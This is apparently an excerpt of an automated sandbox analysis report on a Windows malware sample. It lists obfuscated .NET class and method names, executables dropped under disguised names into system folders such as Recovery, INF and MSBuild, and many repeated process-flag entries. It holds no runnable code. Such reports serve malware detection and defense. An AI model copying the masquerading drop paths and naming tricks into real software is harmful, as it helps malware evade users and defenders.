                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, SxOWr5W00uFXLabCfuQ.csHigh entropy of concatenated method names: 'VGPWCu6lMS', 'ArGWrTRnyr', 'lGjWLdXBJu', 'vaPW9vRdrW', 'sAwWeXlLmP', 'eKrWPnk3Dv', 'v89UJYkv1eOlNDuLkey9', 'blZk0akvuRQFHA0rPLMp', 'CXIeUVkvvCdQ5rpNHXDM', 'ASWPWnkvMU4IFiEXBc9o'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, NaZkwMnoUXyqwwZRSfi.csHigh entropy of concatenated method names: 'Wq8n0tPLCl', 'KaYnZo8t83', 'TfUnCMUGKM', 'TNrXu3km3LOTNCdWsENM', 'vOj3NLkmGZZXgb5oKKW4', 'tVoPpDkm2OtSQogI170D', 'N0qqM6kmwsmCS6QsE6Lv', 'WBcS7mkmqb4LhnQ6CuS8', 'OrfGKQkmy712HGAh2wJh'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, CiRMKUFpP5Z7v8dDZGE.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, yBY00RkNiRRLray4gWb.csHigh entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'FpekyeQeGfX', 'HY1kGjqsMBO', 'qdjHlKknCEEyRBINuaKw', 'wIZF6aknrJRqrAfGj1d4', 'BAeDYCknLDisjPPTC2SO'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, xClD6S4SPgW8TQ2Jr5v.csHigh entropy of concatenated method names: '_25r', 'h65', 'Ge64j0lMXR', 'g4Q47TR8nj', 'YbU4Yl742I', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, etoBl6ERj78SeSsVjOq.csHigh entropy of concatenated method names: 'cf7tQkMMXf', 'AsZtDky2oq', 'u2Tn5Kk5TMJtem3SE1ea', 'WJdB8wk5tSMSYK7iPZUI', 'u4sb6Ok5njSC7UGCCQDt', 'h5QEdWk5iEiQZY3HccW7', 'Xgbts4Uhct', 'CQOTxhk54d0UmYyg5j5L', 'y8ZFU1k5ssUnekYPFyw9', 'rrekHFk5cOprdlLKeIIc'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, abm5dEiGBaM8NyZn4KT.csHigh entropy of concatenated method names: 'NwEi3bPSEi', 'xaQiwvdUWk', '_7Bm', 'B1ZiqFY0KG', 'zNQiyBFcV7', 'MJuiJAs0a3', 'kHGioJEXUl', 'Np2D4gkSx4y5h9SiGEwX', 'qweZaZkSB9BTifnis9ys', 'Xgfk2OkSULpM34DE2AO0'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, xHMBjSoJq38xvTMBGal.csHigh entropy of concatenated method names: 'UNloCwNnji', 'FKZ7YdkR7EgRGLZJIRAo', 'KVDbBAkRdy8Ck9Xl3VTD', 'vSvC8JkRjhMYxe5ICds6', 'mroZaTkRYStudcjpvQsv', 'b5Sww0kRbTXmuCi9GudJ', '_53Y', 'd65', 'GhAk2Kn4Dph', 'PR5k26ofBQx'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, A5pwfYbf4XgyOYxdJ6L.csHigh entropy of concatenated method names: 'rycW8KStTa', 'lBIWGQxi3D', 'tP4XSgkvxA6SiR6LcVO2', 'gPVTO5kvBjaEsDoa9JjN', 'qTZDYSkvN3YLLpZILETV', 'SWyEoxkvIpwecWIVwfbN', 'Rl8pSakvUieN3xJIsIsP', 'GflWONkv5dtENEBKxZZk', 'nwJWp836jp', 'soXG0JkvRJSn3o7KTGCJ'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, BWLwy5qWYubE42Px2D8.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'Snl0cIk4Xt1vRSFo4mCC', 'w8wCB4k4OhIICa08KmS5', 'hWRv9ok4NbGFS8i6n1xy', 'TQm760k4IrJefiSMYD8c'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, mhQqAL9EBpxBqJGo6E0.csHigh entropy of concatenated method names: 'kgc95m3Zi3', 'I0I96DeWMG', 'sIo9Q3XROy', 'XD19DM0oYk', 'sRi9tEb7HR', 'mn79nsdmQB', 'gTa9Tm143q', 'iLh9i2U3If', 'lbv9FYm4BB', 'Hxt9spTeux'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, a9PE5WRE9xrARfrPalW.csHigh entropy of concatenated method names: '_0023wjg', 'Dispose', '_0023Trg', 'MoveNext', '_0023Zvw', 'get_Current', '_0023Wrg', 'Reset', '_0023Xrg', 'get_Current'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, BeNFHgCrZNSspLG2KNU.csHigh entropy of concatenated method names: 'XBfC9rpJNo', 'SiqCeBoWJh', 'NYQCP8ySCc', 'DrGvDHkOh1NCDxHFpoa5', 't4SWPMkOgKwyIIH7wZuf', 'wyAJYekOlcy6rBWty7o5', 'XoKBvakOEN6S54HvBt4Y', 'WIKnPIkOKdK5GQBYPfN2', 'T04IU0kO68tJ7AyktsRL'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, ppUjAxiU9Njow2oOIX9.csHigh entropy of concatenated method names: 'AEm', 'by1', 'KG0imDlAMP', 'uM7', '_197', 'rZu', 'Q1J', '_24u', 'U67', 'xj7'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, fvElIZ3mw2XT4qS18HS.csHigh entropy of concatenated method names: 'MQp3vWVM0v', 'KcK3MSmYdS', 'J5hopAksaKNEflCvZE1m', 'MKR6A7kscENgRjHx2Uaf', 'NgfOtbks470VD61UYfLw', 'albFMQksRvoSu5cV78vQ', 'b5gwkA3Fec', 'AGyZh5ksNiBZcpJ6cjGh', 'c7179vksXOkr2pPR53m9', 'raAMxQksOUdCfwQ1BGNg'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, GaviKWj7ZralkGFucoG.csHigh entropy of concatenated method names: 'wMbky5gZEBZ', 'Ckojb2w356', 'Q0vjWQ9pJ1', 'UcIj1cJhmP', 'lvwOINkWVT4vXgKntTy1', 'WT99cHkWXTZtFYoXZ2mk', 'lSeSHJkWO6rtd8RcPQb6', 'XijEdIkWN1Gr5LPYaY5O', 'G0dQmkkWI7yo0CerTJoJ', 'BN75kmkWx4su9gGGScVK'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, UIsIJDGWeWaypY2axBZ.csHigh entropy of concatenated method names: 'JVGGuC6avl', 'eZSnt1kiV1k0Y8rbUV8N', 'u8Zdp4kiXLG7uvH2UpVs', 'slOy8ikiOvFX08qiCRmT', 'eXJCyHkiNAvI3yUh7IeP', 'TcQZdckiaw2gT4dcNsKg', 'PggYE3kiR9x6raB2tFEF'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, SlLs2JqHlBXN0cf56Hf.csHigh entropy of concatenated method names: 'zNjqZdqgDq', 'YdYqCSCxqu', 'CbDqrJwZxQ', 'pVhefFkcvd5idR7kKkje', 'ChkXB2kcMSnR1Qv9emoI', 'EOPTbqkcfA8lGJExOoNY', 'aGWFX4kczFQ5Ap6kMbOG', 'jiK6gUk4pSOnPv1GJ8jV'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, e1RmYyY2DIJC3nRnLSu.csHigh entropy of concatenated method names: 'cgkYw014si', 'wdXYqCZmOL', 'R7fYystxwR', 'eVuYJNyrCb', '_0023Nn', 'Dispose', 'vr78eNkukELSOwVuXIGm', 'skpamxku8bK5JoctVB7n', 'mT3XOXkuGUrYnx62dPM1', 'UqN4Nuku2Xl2IyAmJUnZ'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, SIaDYtZBRQ7pqpEESFK.csHigh entropy of concatenated method names: 'zMvZ5edhWN', 'DQHZm143dw', 'LSbZSiENCE', 'TK3ZdPTM5M', 'M5oZjn4VVC', 'COM7RVkO29B4BNZibxOH', 'eEhnQ4kO80ysxqZd3kTY', 'dXDNN5kOGRNJDKAnnOBm', 'KCBhKrkO34vteeaXpkgO', 'qD8xEokOwg0ahw0tQdxx'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, O8IRanMhFUERYs4psDF.csHigh entropy of concatenated method names: 'rGLMcxaI4e', 'mVRM4wGnuE', 'ThnMaDunlu', 'MCMMRs3gMI', 'bT1MVlYCAi', 'ftlMXT79KK', 'QIBMOibo7T', 'n2vMN7jD3e', 'mgoMIKqA3D', 'n70MxbW3LS'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, UdT46Wd7Z5V2rKtRJeb.csHigh entropy of concatenated method names: 'AyudbDBE04', 'CkudWmOs7b', 'Xyld1V6yys', 'JVWduN9OO6', 'PDndvQuRpi', 'TEPdMhAeZF', 'ejMdf9egcI', 'woudzZo6K2', 'RCVjpH0vSv', 'abyjkh7yv9'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Bm7cHek105oAiFrOLkG.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'cE4kyAKkBxp', 'HY1kGjqsMBO', 'UqJQ0pknDuqpnC3y3aTd', 'UQPv8hknt30HQR4ubrOZ', 'hH0MH8knnmyNFU8iKZAg'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, zJZEXjySSIsZb6lI4D9.csHigh entropy of concatenated method names: 'O8hyW5LfYW', 'hEEy1ek9GG', 'P9myuWby9t', 'namyvC12eq', 'iclyMaYCvc', 's2jyfZ6CfI', 'oT3yzrScOF', 'wg4U8ukaTGhmw4BndmjC', 'NWIU3qkat8tnkbcr0Tap', 'LdVt5MkanbLBUuWAjdlC'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, w4Rh9T8iGcCfGTxqqlB.csHigh entropy of concatenated method names: 'QBD8Ny8tpl', 'qUp4X2kTe7I91Maud0MU', 'YEhEgkkTPdugAAydX3Ss', 'kSfmglkTAIdT2R8ZNiLW', 'gT1ZUbkTgTCfJvGyeeX4', 'Vf1QUqkTlEk0fsD7ypff', 'olS8sjb5rJ', 'JgT8cTej0t', 'xxH84UnDeU', 'urW8aSekKe'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, KFyh7i32JRlE78nagrw.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'O323whvWVy', 'NGR3qdhEO8', 'jgx3ypr6gN', 'wcDYIMkF7VBs2LOOJsGv', 'rEqsaYkFYQNHfC5mlRPj', 'OP8aZAkFbviM5LHSa4Tx', 'cDfW4rkFWPv35jQJ1wFu', 'D7FHkAkF1WcvOgGPbILn'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, W1qbCtoXdCEqkNwqP7j.csHigh entropy of concatenated method names: '_2SY', 'JAvkyRp6aXv', 'KB4oN3rkZn', 'bEMkyVki5eT', 'Gr06XukVKxrxWIT308jX', 'lEpw0qkVhF0T0koyYBnZ', 'yfmKYPkVEm2ViLqJ5FhS', 'NLRCILkV6pxJgVEGuqO5', 'EZHj9akVQU4Kkv54IdgB', 'vqUvwVkVDIvxkygQGBv4'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, yXc9xTkDaOWaSaiLAOY.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'aTUkyLnuyWT', 'HY1kGjqsMBO', 'TAd8DMktW9FftdQ05mjG', 'CCaE6qkt1BR0T60NSkgS', 'fudeHLktu5x4U9s9Cbia'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, l26juAHiEXBwvKqpSCZ.csHigh entropy of concatenated method names: 'BjbZArJtup', 'iGBj1CkXmoVJFLuoNV9H', 'O3h3pmkXU2XVbiDITob9', 'dPdnlGkX55ivjPnI7VAx', 'vCIZTIkXSXOfEYdws37E', 'e7FHsZUp8x', 'd47HcdoHaT', 'jDuH4jCog2', 'sNcHapXo8c', 'WC2HR2aBRx'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, jyrVLy3Z2imgPxywK9e.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'nO6kylHpIFU', 'AgikGzNCMK9', 'Cg16k2ks8XYy9VDYgdw5', 'KjcR2yksGDuU4AvpXP9U', 'cg7EJsks2T4WIBnZ0D2Q', 'wtJ0Ukks3iw2EQmrOutb', 'a8hp64kswEmPQpYchyNq'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, bJeJaqcEDpnNxATInDg.csHigh entropy of concatenated method names: 'v1O4Lb8qt9', 'idY7eGkj16g75i3STUkd', 'g4LDGYkjuJoYA2LdN6sq', 'GRlPT2kjvfuNVouuJsxb', 'i5X', 'EtVc6a1VEB', 'W93', 'L67', '_2PR', 'p6J'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, yimSUtocdTMZdKd81Ih.csHigh entropy of concatenated method names: 'Yi3', 'uwqky40mLkm', 'lgsoaLNSQT', 'VlgkyaUkPuO', 'xqThAokV9NOQdbNCXcFO', 'oHffaCkVeFLcW1QKmDmJ', 'ylKAWukVrHMNYJtAe8BF', 'X9uDcBkVLUK7wJEHFsio', 'CXHD5HkVPUfSjvrBvQUO', 'ERtU1gkVAS7UwnrPgJOB'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, thJmf8G9pfGt1wnVJmY.csHigh entropy of concatenated method names: 'dF5GnN4u9K', 'KjsGTMmQTu', 'Kf9GiWVthK', 'xjh2unkirNIQWNk1BveL', 'SLrjvSkiZB304eU0BXt2', 'i6rACOkiCajnaJL0DTgp', 'ntBFwrkiLWB4pN4xjCU1', 'vvGG6Ssp54', 'fiUGQ79qNR', 'zS4qVqkioBSaJYlsrNkx'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, jN6GT5e8kfd4FTJRnJc.csHigh entropy of concatenated method names: 'wdceetwty5', 'NLyeAFxRhv', 'sv6e2dMQoj', 'hlge3wWkXG', 'JBpewPP0gF', 'yCfeqqoKM4', 'M0Seyx8eMa', 'VPAeJkUJXv', 'onueogI9Ac', 'T2ReHHC9ix'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, bmWJCmnGmJi2g1h4uU9.csHigh entropy of concatenated method names: 'vKin3THyfv', 'EyNnwIrSiY', 'v4SnqVnRHF', 'VQmnyYQRZb', 'jf6nJsGJSk', 'wbkT3ck5vAuhWAbB3l5j', 'dDvDY6k51USZC76cj2Pd', 'F5CbOvk5uoKlByOmvhy2', 'zmxUJqk5MQFRhdN0NCbL', 'ppRcxnk5fcnWmZ6Y8dLm'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, pDPQKAVPQdLebvFxeLx.csHigh entropy of concatenated method names: 'r0OVgerxL2', 'wNUVlHuLKa', 'QHQVhhJ28r', 'EZOVErwvnR', 'f7ZVKeA71s', 'GZoV6SGwtp', 'DQkVQZFFra', 'TP0VDiS3Mr', 'R2tVtxCstA', 'e5OVnjHkmB'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, t58gH1LzSC4162RXVQU.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'eys9kTCDhj', 'zVk98Lb9KI', 'gY2', 'rV4', '_28E'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Xhfh6t8k6AEm3HiTQxh.csHigh entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'kiZkygcknm6', 'HY1kGjqsMBO', 'msaCkeknaKiTcACkV5Sc', 'nrqhGtknRqx8RnQyRso3', 'PbNAh4knVQ3RFPYHCF2m'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, gvLAEU3EcG337IeIPWx.csHigh entropy of concatenated method names: 'lZh3aHesDX', 'kcp3RDgGY2', 'b9Wbr1ksEI9Cdx7GHcWd', 'ANkLv2ksKE4WBuGpsYHG', 'Ow736iDVp0', 'RmK3QPxl6F', 'uqW3DIlpvv', 'ynL3tpF5Ef', 'Wib3nHoTTu', 'K3T3TI818g'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, FBmtbAueepP1Y0u626M.csHigh entropy of concatenated method names: 'irS835UmASP', 'wtyrGckMEdrcvHxthSl5', 'hGCNPYkMKHeN2yBV9jNH', 'oWYLfhkM6O55Z01qXWFR', 'IIDA0EkMQVoqs9J8mMnt'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, BoBUuSebhyUJRedHPla.csHigh entropy of concatenated method names: 'YBaCL7kBOCEAN6Jd7EMJ', 'wLfI2GkBViOWbjaienSd', 'hjAb2TkBXw4AYWlbKOcq', 'LQN6FikBNuG1Zgb0R8Rg', 'MWDEQivN5a', 'CEcDZakBUlXtpj6nPlrr', 'q4bMoHkBx8fJRyS5oauL', 'FYcU2gkBBFOWwWuAjZuW', 'DtqBwqkB5aPEyhWFKhUV', 'bAwIEqkBmmRf9OP5TSME'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, AvoTdUrfxxyY7sd61mu.csHigh entropy of concatenated method names: 'iiDLp37miX', 'Sb5LkNHuY9', 'pSgL8PdIFY', 'vBALGdwiXi', 'qKxL2N3qef', 'UtUK3SkNqwaUFAbGmqQs', 'gt0iyQkNyMsptHruG0dF', 'xrPnmCkNJVq9llP4Xb42', 'cHTguEkNoEqJAwDbuwha', 'HF5lH1kNHRuYILaT28DR'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, dWjKsOZieIqqsU4xFwU.csHigh entropy of concatenated method names: 'L2l', 'Jo5', '_2EF', 'i4P', '_6c7', '_77i', '_38r', '_142', 'Xhv', 'eT3'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, pnHVjbCYmD4kSpDeZb6.csHigh entropy of concatenated method names: 'tvVCW7yI3Y', 'rtrC1McxtT', 'wLUCuULKyj', 'fqDCvMDjep', 'uZ8CM6Lwxf', 'KU4QmIkOxy4Bvbr6i1dM', 'Dq5vwpkONbtgkKZxehYL', 'LCK72KkOIVCc4ea3fSqm', 'nCyBTTkOB5YX9VJVTlgY', 'K8I1GRkOUFxeLJXDf3Ge'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, tFJ2ZYrARmC53dqdM0b.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'upKrlKhJaw', '_947', 'tXGrh6p9iM', 'eoFrEsOZtx', '_1f8', '_71D'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, cwhXhM8yhd1X7huhsEL.csHigh entropy of concatenated method names: 'Huy8oQvOAD', 'Kg48H8pcV4', 'bHb80gMFjw', 'a4VOhBknUT56eN6JQIV0', 'bufCONkn5HnBbeLsV72o', 'XyEKOgknm1LDAqwvyO2C', 'fKXOKmknSeqd9HqMtlcT', 'e8S8dUkndHfDTqh0BaqC', 'PZcPGdknjLbBpEGOAW8K', 'vQvML6kn78qgQb1FKlIg'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, jIVF2XjuUTSTbjVWYVy.csHigh entropy of concatenated method names: 'IdX70mOabb', 'XEE2tbk1e1KhHrTqUlkE', 'kKeXHOk1P3Xg6bXyJGkW', 'IRNJtdk1LC6C1Wdah7TF', 'Nfn3O5k190CQRbqMR2dy', 'EZGe8pk1AhdtPjgFTxEB', 'CPX', 'h7V', 'G6s', '_2r8'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, UAhFZSiV04MSVPQJUpr.csHigh entropy of concatenated method names: 'ngPiOOkI53', 'XdNiNN5suu', 'wSOiIES5D0', 'G9bixBKpAL', 'RqEiBgkuEQ', 'VxquKckdQ6fGLMvgDEnT', 'cReZ0mkdDvp1qVwJbjsp', 'VJWTlYkdKeAGiusYZbVl', 'EGqIFhkd6N1wNsoUF0W5', 'd4xKQXkdtZWhYvYs82Yl'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, uFG2SYJF7LoJcbj3jVP.csHigh entropy of concatenated method names: 'mPGJNmhZUj', 'ooBFtUkRHHnsGiePnMY3', 'w3cu7ekRJ79vQtnEjP9M', 'msAWSVkRooluTdvHS93K', 'etW08JkR0jjHBe35hFXM', 'j1PvNYkRZoXD5OqEaAJk', 'UU8', 'd65', 'ufOk2CBbX0E', 'K8bk2rwEn2C'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, IFkZCCGSvkwuD5n9KJt.csHigh entropy of concatenated method names: 'K6XGYQKmhm', 'RWydSckistDB6yL8Qia4', 'w1kUbBkiiQ6rdbBUX1BG', 'Kscr8ukiFHZkB8uJ13HB', 'hjGCxlkictbytl9KL0o7', 'ISyGj6VcZA', 'WkrMlbkiDTedHWjgUSCN', 'CqXoyrkitRyJj3uShyO6', 's3wrEcki6bdvOv3JicST', 'BLvWpvkiQjQhvD66RpTu'
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeFile created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Recovery\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
